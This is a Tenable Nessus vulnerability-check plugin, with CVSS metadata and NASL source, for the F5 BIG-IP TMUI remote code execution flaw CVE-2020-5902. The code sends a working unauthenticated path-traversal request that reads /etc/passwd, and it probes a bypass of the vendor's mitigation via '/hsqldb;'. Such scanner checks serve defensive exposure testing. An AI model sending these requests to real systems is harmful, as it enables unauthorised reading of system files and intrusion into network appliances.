CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
100.0%
A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
Note: The vendor's initial mitigation for this vulnerability can be bypassed.
This plugin also tests for the bypass of that initial mitigation.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
if (description)
{
# Plugin identity and revision metadata.
script_id(138140);
script_version("1.14");
script_set_attribute(attribute:"plugin_modification_date", value:"2023/01/18");
script_cve_id("CVE-2020-5902");
# Cross-references: DoD IAVA, CISA Known Exploited Vulnerabilities entry,
# CISA advisory and CEA identifiers.
script_xref(name:"IAVA", value:"2020-A-0283-S");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");
script_xref(name:"CISA-NCAS", value:"AA22-011A");
script_xref(name:"CEA-ID", value:"CEA-2020-0129");
script_xref(name:"CEA-ID", value:"CEA-2020-0122");
script_xref(name:"CEA-ID", value:"CEA-2020-0055");
script_name(english:"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)");
script_set_attribute(attribute:"synopsis", value:
"BIG-IP Traffic Management User Interface Remote Code Execution.");
# Description shown in the report; it also states that the check covers
# the bypass of the vendor's first mitigation.
script_set_attribute(attribute:"description", value:
"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the
Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute
arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.");
script_set_attribute(attribute:"see_also", value:"https://support.f5.com/csp/article/K52145254");
script_set_attribute(attribute:"solution", value:
"Upgrade to a version recommended in the vendor advisory.");
# CVSS v2 and v3 base/temporal vectors; the v3 vector is encoded with the
# 3.0 prefix. The score source is the CVE itself.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-5902");
# Exploitability metadata: public exploit modules exist (Core, D2 Elliot,
# Metasploit), the flaw is flagged as exploited by malware, and Nessus
# itself exercises it (this is an active check, see ACT_ATTACK below).
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"F5 BIG-IP Traffic Management User Interface File Disclosure");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
# Publication dates: vulnerability and patch were disclosed the same day.
script_set_attribute(attribute:"vuln_publication_date", value:"2020/07/01");
script_set_attribute(attribute:"patch_publication_date", value:"2020/07/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/06");
script_set_attribute(attribute:"plugin_type", value:"remote");
# Affected products: the BIG-IP hardware platform and each module that
# ships the TMUI / Configuration utility.
script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_analytics");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_domain_name_system");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_fraud_protection_service");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
script_set_attribute(attribute:"stig_severity", value:"I");
script_end_attributes();
# ACT_ATTACK: the plugin sends requests that exercise the flaw against the
# target instead of reasoning from a version string; schedule it accordingly.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Runs only once the BIG-IP web management UI has been detected on an HTTP port.
script_dependencies("bigip_web_detect.nasl");
script_require_keys("installed_sw/F5 BIG-IP web management");
script_require_ports("Services/www", 80, 443);
exit(0);
}
include('http.inc');
include('install_func.inc');

##
# Sends a single GET for the given path and returns the response body.
# The plugin exits if the request itself fails (exit_on_fail:TRUE), so
# a return value always holds a body (possibly empty).
#
# @param port  HTTP port to contact
# @param path  request path, sent verbatim
#
# @return body of the HTTP response
##
function fetch_body(port, path)
{
  local_var resp;

  resp = http_send_recv3(
    method       : 'GET',
    port         : port,
    item         : path,
    exit_on_fail : TRUE
  );
  return resp[2];
}

app_name = 'F5 BIG-IP web management';
get_install_count(app_name:app_name, exit_if_zero:TRUE);
port = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);
install = get_single_install(app_name:app_name, port:port);
url = build_url(qs:"/", port:port);

# Evidence of the original flaw: the unauthenticated request reaches
# fileRead.jsp and the response carries the root entry of /etc/passwd.
passwd_pattern = "root:.*:0:[01]:";
poc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';
# Evidence that the vendor's initial mitigation is bypassed: the HSQLDB
# servlet is still reachable through the alternate path.
bypass_path = '/hsqldb;';

body = fetch_body(port:port, path:poc_path);

if (egrep(pattern:passwd_pattern, string:body))
{
  # Original flaw confirmed. The response embeds the file with escaped
  # newlines; unescape them so the attachment reads like the file itself.
  # Note that the first 10 lines of the target's /etc/passwd end up in the
  # scan report, so treat the report output as sensitive.
  output = str_replace(string:body, find:'\\n', replace:'\n');
  file = "/etc/passwd";
  generic = FALSE;
  line_limit = 10;
}
else
{
  # Original path blocked (or not vulnerable); probe the mitigation bypass.
  body = fetch_body(port:port, path:bypass_path);
  if ('HSQL Database Engine Servlet' >!< body)
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, url);

  # Bypass confirmed: report a short excerpt of the servlet banner instead
  # of a file attachment.
  output = chomp(body);
  file = NULL;
  generic = TRUE;
  line_limit = 3;
}

# The attached request is whichever probe produced the evidence.
security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  request     : make_list(http_last_sent_request()),
  file        : file,
  generic     : generic,
  output      : output,
  line_limit  : line_limit,
  attach_type : 'text/plain'
);